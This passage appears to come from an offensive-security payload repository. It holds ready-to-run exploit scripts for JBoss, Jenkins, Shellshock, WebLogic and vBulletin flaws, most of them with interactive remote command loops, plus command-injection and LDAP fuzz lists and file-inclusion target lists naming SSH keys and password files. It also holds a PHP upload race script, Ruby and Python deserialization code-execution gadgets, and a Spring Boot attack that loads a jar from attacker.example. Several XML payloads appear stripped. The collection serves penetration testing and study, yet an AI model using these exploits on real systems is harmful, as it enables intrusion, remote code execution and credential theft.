print('[*] Target PORT: {}'.format(port))

gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])

r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)

if r.status_code == 200:
    print('[+] Command executed successfully')

--------------------------------------------------------------------------------
/CVE Exploits/Jenkins CVE-2016-0792.py:
--------------------------------------------------------------------------------
#! /usr/bin/env python2

#Jenkins Groovy XML RCE (CVE-2016-0792)
#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
#Made with <3 by @byt3bl33d3r

from __future__ import print_function
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

import argparse
import sys

parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='Target IP:PORT')
parser.add_argument('command', type=str, help='Command to run on target')
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')

if len(sys.argv) < 2:
    parser.print_help()
    sys.exit(1)

args = parser.parse_args()

if len(args.target.split(':')) != 2:
    print('[-] Target must be in format IP:PORT')
    sys.exit(1)

if not args.command:
    print('[-] You must specify a command to run')
    sys.exit(1)

ip, port = args.target.split(':')

print('[*] Target IP: {}'.format(ip))
print('[*] Target PORT: {}'.format(port))

xml_formatted = ''
command_list = args.command.split()
for cmd in command_list:
    xml_formatted += '{:>16}{}\n'.format('', cmd)

xml_payload = '''




hashCode




{}

false

0
0

0
start



1

'''.format(xml_formatted.strip())

print('[*] Generated XML payload:')
print(xml_payload)
print()

print('[*] Sending payload')
headers = {'Content-Type': 'text/xml'}
r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)

paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
if r.status_code == 500:
    for path in paths_in_trace:
        if path in r.text:
            print('[+] Command executed successfully')
            break

--------------------------------------------------------------------------------
/CVE Exploits/Jenkins Groovy Console.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
from __future__ import print_function
from builtins import input
import requests
import sys

print("""
Jenkins Groovy Console cmd runner.

usage: ./jgc.py [HOST]

Then type any command and wait for STDOUT output from remote machine.
Type 'exit' to exit :)
""")
URL = sys.argv[1] + '/scriptText'
HEADERS = {
    'User-Agent': 'jgc'
}

while 1:
    CMD = input(">> Enter command to execute (or type 'exit' to exit): ")
    if CMD == 'exit':
        print("exiting...\n")
        exit(0)

    DATA = {
        'script': 'println "{}".execute().text'.format(CMD)
    }
    result = requests.post(URL, headers=HEADERS, data=DATA)
    print(result.text)

--------------------------------------------------------------------------------
/CVE Exploits/Shellshock CVE-2014-6271.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

# Successful Output:
# # python shell_shocker.py
# [+] Attempting Shell_Shock - Make sure to type full path
# ~$ /bin/ls /
# bin
# boot
# dev
# etc
# ..
# ~$ /bin/cat /etc/passwd

from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
import sys, urllib.request, urllib.error, urllib.parse

if len(sys.argv) != 2:
    print("Usage: shell_shocker ")
    sys.exit(0)

URL=sys.argv[1]
print("[+] Attempting Shell_Shock - Make sure to type full path")

while True:
    command=input("~$ ")
    opener=urllib.request.build_opener()
    opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
    try:
        response=opener.open(URL)
        for line in response.readlines():
            print(line.strip())
    except Exception as e: print(e)

--------------------------------------------------------------------------------
/CVE Exploits/WebLogic CVE-2017-10271.py:
--------------------------------------------------------------------------------
from __future__ import print_function
from builtins import input
import requests
import sys

url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType" 8 | payload_header = {'content-type': 'text/xml'} 9 | 10 | 11 | def payload_command (command_in): 12 | html_escape_table = { 13 | "&": "&", 14 | '"': """, 15 | "'": "'", 16 | ">": ">", 17 | "<": "<", 18 | } 19 | command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in)+"" 20 | payload_1 = " \n" \ 21 | " " \ 22 | " \n" \ 23 | " \n" \ 24 | " \n" \ 25 | " " \ 26 | " " \ 27 | " cmd " \ 28 | " " \ 29 | " " \ 30 | " /c " \ 31 | " " \ 32 | " " \ 33 | + command_filtered + \ 34 | " " \ 35 | " " \ 36 | " " \ 37 | " " \ 38 | " " \ 39 | " " \ 40 | " " \ 41 | " " \ 42 | "" 43 | return payload_1 44 | 45 | def do_post(command_in): 46 | result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) 47 | 48 | if result.status_code == 500: 49 | print("Command Executed \n") 50 | else: 51 | print("Something Went Wrong \n") 52 | 53 | 54 | 55 | print("***************************************************** \n" \ 56 | "**************** Coded By 1337g ****************** \n" \ 57 | "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ 58 | "***************************************************** \n") 59 | 60 | while 1: 61 | command_in = input("Eneter your command here: ") 62 | if command_in == "exit" : exit(0) 63 | do_post(command_in) 64 | -------------------------------------------------------------------------------- /CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh: -------------------------------------------------------------------------------- 1 | curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" -------------------------------------------------------------------------------- /Command Injection/Intruder/command-execution-unix.txt: -------------------------------------------------------------------------------- 1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> 2 | 
<!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="/usr/bin/id;-->
/index.html|id|
";id;"
';id;'
;id;
;id
;netstat -a;
"|id|"
'|id|'
|id
|/usr/bin/id
|id|
"|/usr/bin/id|"
'|/usr/bin/id|'
|/usr/bin/id|
"||/usr/bin/id|"
'||/usr/bin/id|'
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
"\n/bin/ls -al\n"
'\n/bin/ls -al\n'
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%22%0A/usr/bin/id%0A%22
%27%0A/usr/bin/id%0A%27
%0A/usr/bin/id%0A
%0Aid%0A
"& ping -i 30 127.0.0.1 &"
'& ping -i 30 127.0.0.1 &'
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id

--------------------------------------------------------------------------------
/File Inclusion/Intruders/BSD-files.txt:

/usr/pkg/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/apache2/httpd.conf
/var/www/conf/httpd.conf
/var/www/logs/error_log
/var/www/logs/access_log
/etc/apache2/httpd2.conf
/var/apache2/logs/error_log
/var/apache2/logs/access_log
/var/log/httpd-error.log
/var/log/httpd-access.log
/var/log/httpd/error_log
/var/log/httpd/access_log

--------------------------------------------------------------------------------
/File Inclusion/Intruders/LFI-FD-check.txt:

/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35

--------------------------------------------------------------------------------
/File Inclusion/Intruders/LFI-WindowsFileCheck.txt:

php://input
C:\boot.ini
C:\WINDOWS\win.ini
C:\WINDOWS\php.ini
C:\WINDOWS\System32\Config\SAM
C:\WINNT\php.ini
C:\xampp\phpMyAdmin\config.inc
C:\xampp\phpMyAdmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc
C:\xampp\phpmyadmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc.php
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\apache\conf\httpd.conf
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\mercury.ini
C:\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\tomcat\conf\tomcat-users.xml
C:\xampp\tomcat\conf\web.xml
C:\xampp\sendmail\sendmail.ini
C:\xampp\webalizer\webalizer.conf
C:\xampp\webdav\webdav.txt
C:\xampp\apache\logs\error.log
C:\xampp\apache\logs\access.log
C:\xampp\FileZillaFTP\Logs
C:\xampp\FileZillaFTP\Logs\error.log
C:\xampp\FileZillaFTP\Logs\access.log
C:\xampp\MercuryMail\LOGS\error.log
C:\xampp\MercuryMail\LOGS\access.log
C:\xampp\mysql\data\mysql.err
C:\xampp\sendmail\sendmail.log
C:\apache\log\error.log
C:\apache\log\access.log
C:\apache\log\error_log
C:\apache\log\access_log
C:\apache2\log\error.log
C:\apache2\log\access.log
C:\apache2\log\error_log
C:\apache2\log\access_log
C:\log\error.log
C:\log\access.log
C:\log\error_log
C:\log\access_log
C:\apache\logs\error.log
C:\apache\logs\access.log
C:\apache\logs\error_log
C:\apache\logs\access_log
C:\apache2\logs\error.log
C:\apache2\logs\access.log
C:\apache2\logs\error_log
C:\apache2\logs\access_log
C:\logs\error.log
C:\logs\access.log
C:\logs\error_log
C:\logs\access_log
C:\log\httpd\access_log
C:\log\httpd\error_log
C:\logs\httpd\access_log
C:\logs\httpd\error_log
C:\opt\xampp\logs\access_log
C:\opt\xampp\logs\error_log
C:\opt\xampp\logs\access.log
C:\opt\xampp\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\xampp\apache\conf\httpd.conf

--------------------------------------------------------------------------------
/File Inclusion/Intruders/Linux-files.txt:

/etc/passwd
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/etc/bashrc
/etc/apache2/apache2.conf
/etc/apache2/ports.conf
/etc/apache2/sites-available/default
/etc/httpd/conf/httpd.conf
/etc/httpd/conf.d
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/init.d/apache2
/etc/mysql/my.cnf
/etc/nginx.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/opt/lamp/log/access_log
/opt/lamp/logs/error_log
/proc/self/environ
/proc/version
/proc/cmdline
/proc/mounts
/proc/config.gz
/root/.bashrc
/root/.bash_history
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/usr/local/apache/htdocs/index.html
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-ssl.conf
/usr/local/apache/logs/error_log
/usr/local/apache/logs/access_log
/usr/local/apache/bin/apachectl
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/extra/httpd-ssl.conf
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/bin/apachectl
/usr/local/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/var/apache/logs/access_log
/var/apache/logs/access.log
/var/apache/logs/error_log
/var/apache/logs/error.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log

--------------------------------------------------------------------------------
/File Inclusion/Intruders/Mac-files.txt:

/etc/apache2/httpd.conf
/Library/WebServer/Documents/index.html
/private/var/log/appstore.log
/var/log/apache2/error_log
/var/log/apache2/access_log
/usr/local/nginx/conf/nginx.conf
/var/log/nginx/error_log
/var/log/nginx/access_log

--------------------------------------------------------------------------------
/File Inclusion/Intruders/Web-files.txt:

/robots.txt
/humans.txt
/style.css
/configuration.php
wp-login.php
wp-admin.php
/wp-content/plugins
/include/config.php
/inc/config.php
/include/mysql.php
/inc/mysql.php
/sites/defaults/settings.php
/phpmyadmin/changelog.php
web.config

--------------------------------------------------------------------------------
/File Inclusion/Intruders/simple-check.txt:

etc/passwd
etc/passwd%00
etc%2fpasswd
etc%2fpasswd%00
etc%5cpasswd
etc%5cpasswd%00
etc%c0%afpasswd
etc%c0%afpasswd%00
C:\boot.ini
C:\WINDOWS\win.ini

--------------------------------------------------------------------------------
/File Inclusion/uploadlfi.py:

```python
from __future__ import print_function
from builtins import range
import itertools
import requests
import string
import sys

# Read the shell once: a file object reused across requests is exhausted after the first POST
shell = open('shell.php', 'rb').read()

print('[+] Trying to win the race')
f = {'file': ('shell.php', shell)}
for _ in range(4096 * 4096):
    # Each upload lands in /tmp/phpXXXXXX for the lifetime of the request; keep the server busy
    requests.post('http://target.com/index.php?c=index.php', files=f)


print('[+] Bruteforcing the inclusion')
# PHP's temporary upload names are six random alphanumerics that may repeat, so use product,
# not combinations (which only yields sorted, non-repeating tuples)
for fname in itertools.product(string.ascii_letters + string.digits, repeat=6):
    url = 'http://target.com/index.php?c=/tmp/php' + ''.join(fname)
    r = requests.get(url)
    if 'load average' in r.text:  # marker the uploaded shell prints once it is included
        print('[+] Included: ' + url)
        break
```

--------------------------------------------------------------------------------
/HTTP Parameter Pollution/README.md (partial):

```
WAF (reads first 'search' param, looks innocent, passes it on) --> Origin Service (reads second 'search' param; the injection happens if no checks are done here)
```

### Table of reference for which technology reads which parameter

When `?par1=a&par1=b` is sent:

| Technology | Parsing Result | Outcome (par1=) |
| ------------------ | --------------- | :-------------: |
| ASP.NET/IIS | All occurrences | a,b |
| ASP/IIS | All occurrences | a,b |
| PHP/Apache | Last occurrence | b |
| PHP/Zeus | Last occurrence | b |
| JSP, Servlet/Tomcat | First occurrence | a |
| Perl CGI/Apache | First occurrence | a |
| Python Flask | First occurrence | a |
| Python Django | Last occurrence | b |
| Nodejs | All occurrences | a,b |
| Golang net/http - `r.URL.Query().Get("param")` | First occurrence | a |
| Golang net/http - `r.URL.Query()["param"]` | All occurrences | a,b |

The attack works whenever the component doing the check (WAF, proxy, front end) and the component using the value pick different occurrences from this table.

## References

- [HTTP Parameter Pollution - Imperva](https://www.imperva.com/learn/application-security/http-parameter-pollution/)
- [HTTP Parameter Pollution in 11 minutes | Web Hacking - PwnFunction](https://www.youtube.com/watch?v=QVZBl8yxVX0&ab_channel=PwnFunction)
- [How to Detect HTTP Parameter Pollution Attacks - Acunetix](https://www.acunetix.com/blog/whitepaper-http-parameter-pollution/)

--------------------------------------------------------------------------------
/Insecure Deserialization/Files/PHP-Serialization-RCE-Exploit.php:

--------------------------------------------------------------------------------
/Insecure Deserialization/Files/Ruby_universal_gadget_generate_verify.rb:

```ruby
#!/usr/bin/env ruby

# Build the Ruby 2.x universal Marshal gadget chain step by step, triggering each link
# in-process to verify it, then emit the serialized payload.

class Gem::StubSpecification
  def initialize; end
end


stub_specification = Gem::StubSpecification.new
# StubSpecification#name opens @loaded_from with Kernel#open: a leading "|" makes it a shell command
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")

puts "STEP n"
stub_specification.name rescue nil
puts


class Gem::Source::SpecificFile
  def initialize; end
end

specific_file = Gem::Source::SpecificFile.new
specific_file.instance_variable_set(:@spec, stub_specification)

other_specific_file = Gem::Source::SpecificFile.new

# SpecificFile#<=> compares @spec.name, reaching the command above
puts "STEP n-1"
specific_file <=> other_specific_file rescue nil
puts


$dependency_list= Gem::DependencyList.new
$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])

# DependencyList#each sorts @specs, invoking <=>
puts "STEP n-2"
$dependency_list.each{} rescue nil
puts


class Gem::Requirement
  def marshal_dump
    [$dependency_list]
  end
end

# Gem::Requirement#marshal_load iterates over the list, so Marshal.load alone fires the chain
payload = Marshal.dump(Gem::Requirement.new)

puts "STEP n-3"
Marshal.load(payload) rescue nil
puts


puts "VALIDATION (in fresh ruby process):"
IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
  pipe.print payload
  pipe.close_write
  puts pipe.gets
  puts
end

puts "Payload (hex):"
puts payload.unpack('H*')[0]
puts


require "base64"
puts "Payload (Base64 encoded):"
puts Base64.encode64(payload)
```

--------------------------------------------------------------------------------
/Insecure Deserialization/Python.md:

# Python Deserialization

## Pickle

The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
```python
import cPickle
from base64 import b64encode, b64decode

class User:
    def __init__(self):
        self.username = "anonymous"
        self.password = "anonymous"
        self.rank = "guest"

h = User()
auth_token = b64encode(cPickle.dumps(h))
print("Your Auth Token : {}".format(auth_token))
```

The vulnerability is introduced when a token is loaded from user input.

```python
new_token = raw_input("New Auth Token : ")
token = cPickle.loads(b64decode(new_token))
print "Welcome {}".format(token.username)
```

The Python 2.7 documentation clearly states that pickle should never be used with untrusted sources. Let's create malicious data that will execute arbitrary code on the server.

> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

```python
import os
import cPickle
from base64 import b64encode, b64decode

class Evil(object):
    # __reduce__ tells pickle which callable to invoke (and with which arguments) when the object is rebuilt
    def __reduce__(self):
        return (os.system,("whoami",))

e = Evil()
evil_token = b64encode(cPickle.dumps(e))
print("Your Evil Token : {}".format(evil_token))
```

## References

* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)

--------------------------------------------------------------------------------
/Insecure Deserialization/README.md:

# Insecure Deserialization

> Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. Deserialization is the reverse of that process -- taking data structured from some format, and rebuilding it into an object - OWASP

Check the following sub-sections, located in other files:

* [Java deserialization : ysoserial, ...](Java.md)
* [PHP (Object injection) : phpggc, ...](PHP.md)
* [Ruby : universal rce gadget, ...](Ruby.md)
* [Python : pickle, ...](Python.md)

## References

* [Github - ysoserial](https://github.com/frohoff/ysoserial)
* [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net)
* [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
* [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
* [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
* [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
* [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
* [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
* [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
* [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin
* [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg
* [Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
* [Diving into unserialize() - Sep 19 - Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e)
* [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & Oleksandr Mirosh

--------------------------------------------------------------------------------
/Insecure Deserialization/Ruby.md:

# Ruby Deserialization

## Marshal.load

Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5 (the hex string is the Marshal payload produced by the generator script in `Files/`):

```bash
for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
```

## YAML.load

Vulnerable code

```ruby
require "yaml"
YAML.load(File.read("p.yml"))
```

Exploitation code (the same Gem gadget chain expressed as YAML object tags)

```yaml
--- !ruby/object:Gem::Requirement
requirements:
  !ruby/object:Gem::DependencyList
  specs:
  - !ruby/object:Gem::Source::SpecificFile
    spec: &1 !ruby/object:Gem::StubSpecification
      loaded_from: "|id 1>&2"
  - !ruby/object:Gem::Source::SpecificFile
    spec:
```

## References

- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
- [Universal RCE with Ruby YAML.load - @_staaldraad](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)

--------------------------------------------------------------------------------
/Insecure Direct Object References/Images/idor.png:

https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Insecure Direct Object References/Images/idor.png

--------------------------------------------------------------------------------
/Insecure Direct Object References/README.md:

# Insecure Direct Object References

> Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP

## Summary

* [Tools](#tools)
* [Exploit](#exploit)
* [Examples](#examples)
* [References](#references)

## Tools

- Burp Suite plugin Authz
- Burp Suite plugin AuthMatrix
- Burp Suite plugin Autorize

## Exploit

![IDOR](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png)

The value of a parameter is used directly to retrieve a database record.

```powershell
http://foo.bar/somepage?invoice=12345
```

The value of a parameter is used directly to perform an operation in the system.

```powershell
http://foo.bar/changepassword?user=someuser
```

The value of a parameter is used directly to retrieve a file system resource.

```powershell
http://foo.bar/showImage?img=img00011
```

The value of a parameter is used directly to access application functionality.

```powershell
http://foo.bar/accessPage?menuitem=12
```

In every case the test is the same: replay the request with another user's identifier (or another session) and confirm whether the server checks that the caller is authorized for that object.

## Examples

* [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
* [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661)

## References

* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
* [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec
* [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
* [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/)
* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)

--------------------------------------------------------------------------------
/Insecure Management Interface/Intruder/springboot_actuator.txt:

auditevents
autoconfig
beans
caches
conditions
configprops
dump
env
flyway
health
heapdump
httptrace
info
integrationgraph
jolokia
logfile
loggers
liquibase
metrics
mappings
prometheus
scheduledtasks
sessions
shutdown
threaddump
trace
actuator/auditevents
actuator/autoconfig
actuator/beans
actuator/caches
actuator/conditions
actuator/configprops
actuator/dump
actuator/env
actuator/flyway
actuator/health
actuator/heapdump
actuator/httptrace
actuator/info
actuator/integrationgraph
actuator/jolokia
actuator/logfile
actuator/loggers
actuator/liquibase
actuator/metrics
actuator/mappings
actuator/prometheus
actuator/scheduledtasks
actuator/sessions
actuator/shutdown
actuator/threaddump
actuator/trace

--------------------------------------------------------------------------------
/Insecure Management Interface/README.md:

# Insecure management interface

## Springboot-Actuator

Actuator endpoints let you monitor and interact with your application.
Spring Boot includes a number of built-in endpoints and lets you add your own.
For example, the `/health` endpoint provides basic application health information.

Some of them contain sensitive information, such as:

- `/trace` - Displays trace information (by default the last 100 HTTP requests with headers).
12 | - `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment). 13 | - `/heapdump` - Builds and returns a heap dump from the JVM used by our application. 14 | - `/dump` - Displays a dump of threads (including a stack trace). 15 | - `/logfile` - Outputs the contents of the log file. 16 | - `/mappings` - Shows all of the MVC controller mappings. 17 | 18 | These endpoints are enabled by default in Springboot 1.X. 19 | Note: Sensitive endpoints will require a username/password when they are accessed over HTTP. 20 | 21 | Since Springboot 2.X only `/health` and `/info` are enabled by default. 22 | 23 | ### Remote Code Execution via `/env` 24 | 25 | Spring is able to load external configurations in the YAML format. 26 | The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks. 27 | In other words, an attacker can gain remote code execution by loading a malicious config file. 28 | 29 | #### Steps 30 | 31 | 1. Generate a payload of SnakeYAML deserialization gadget. 32 | 33 | - Build malicious jar 34 | ```bash 35 | git clone https://github.com/artsploit/yaml-payload.git 36 | cd yaml-payload 37 | # Edit the payload before executing the last commands (see below) 38 | javac src/artsploit/AwesomeScriptEngineFactory.java 39 | jar -cvf yaml-payload.jar -C src/ . 40 | ``` 41 | 42 | - Edit src/artsploit/AwesomeScriptEngineFactory.java 43 | 44 | ```java 45 | public AwesomeScriptEngineFactory() { 46 | try { 47 | Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE 48 | } catch (IOException e) { 49 | e.printStackTrace(); 50 | } 51 | } 52 | ``` 53 | 54 | - Create a malicious yaml config (yaml-payload.yml) 55 | 56 | ```yaml 57 | !!javax.script.ScriptEngineManager [ 58 | !!java.net.URLClassLoader [[ 59 | !!java.net.URL ["http://attacker.example/yaml-payload.jar"] 60 | ]] 61 | ] 62 | ``` 63 | 64 | 65 | 2. Host the malicious files on your server. 
66 | 67 | - yaml-payload.jar 68 | - yaml-payload.yml 69 | 70 | 71 | 3. Change `spring.cloud.bootstrap.location` to your server. 72 | 73 | ``` 74 | POST /env HTTP/1.1 75 | Host: victim.example:8090 76 | Content-Type: application/x-www-form-urlencoded 77 | Content-Length: 59 78 | 79 | spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml 80 | ``` 81 | 82 | 4. Reload the configuration. 83 | 84 | ``` 85 | POST /refresh HTTP/1.1 86 | Host: victim.example:8090 87 | Content-Type: application/x-www-form-urlencoded 88 | Content-Length: 0 89 | ``` 90 | 91 | ## References 92 | 93 | * [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) 94 | * [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) 95 | -------------------------------------------------------------------------------- /LDAP Injection/Intruder/LDAP_FUZZ.txt: -------------------------------------------------------------------------------- 1 | * 2 | *)(& 3 | *))%00 4 | *()|%26' 5 | *()|&' 6 | *(|(mail=*)) 7 | *(|(objectclass=*)) 8 | *)(uid=*))(|(uid=* 9 | */* 10 | *| 11 | / 12 | // 13 | //* 14 | @* 15 | | 16 | admin* 17 | admin*)((|userpassword=*) 18 | admin*)((|userPassword=*) 19 | x' or name()='username' or 'x'='y 20 | ! 
